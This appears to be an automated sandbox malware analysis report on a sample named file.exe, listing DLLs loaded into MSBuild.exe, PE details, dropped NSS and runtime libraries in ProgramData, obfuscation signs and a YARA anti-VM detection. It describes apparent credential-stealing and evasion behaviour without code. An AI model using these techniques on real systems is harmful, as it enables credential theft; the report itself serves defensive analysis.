Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00418950

PE file contains sections with non-standard names

Source: freebl3.dll.4.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: softokn3.dll.4.dr	Static PE information: section name: .00cfg
Source: nss3.dll.4.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066701A push ecx; ret	0_2_0066702D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006171D0 push ecx; ret	0_2_006171E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006673E8 push cs; ret	0_2_006673E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006673B8 push esp; retn 0003h	0_2_006673BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006699ED push 0000004Ch; iretd	0_2_006699FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00655C8D push ecx; ret	0_2_00655CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042F142 push ecx; ret	4_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00422D3B push esi; ret	4_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041DDB5 push ecx; ret	4_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00432715 push 0000004Ch; iretd	4_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB536 push ecx; ret	4_2_6C8BB549
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B6686B push edx; ret	13_2_00B66873
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF71D0 push ecx; ret	13_2_00AF71E3

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\CBFCFBFBFB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\CBFCFBFBFB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
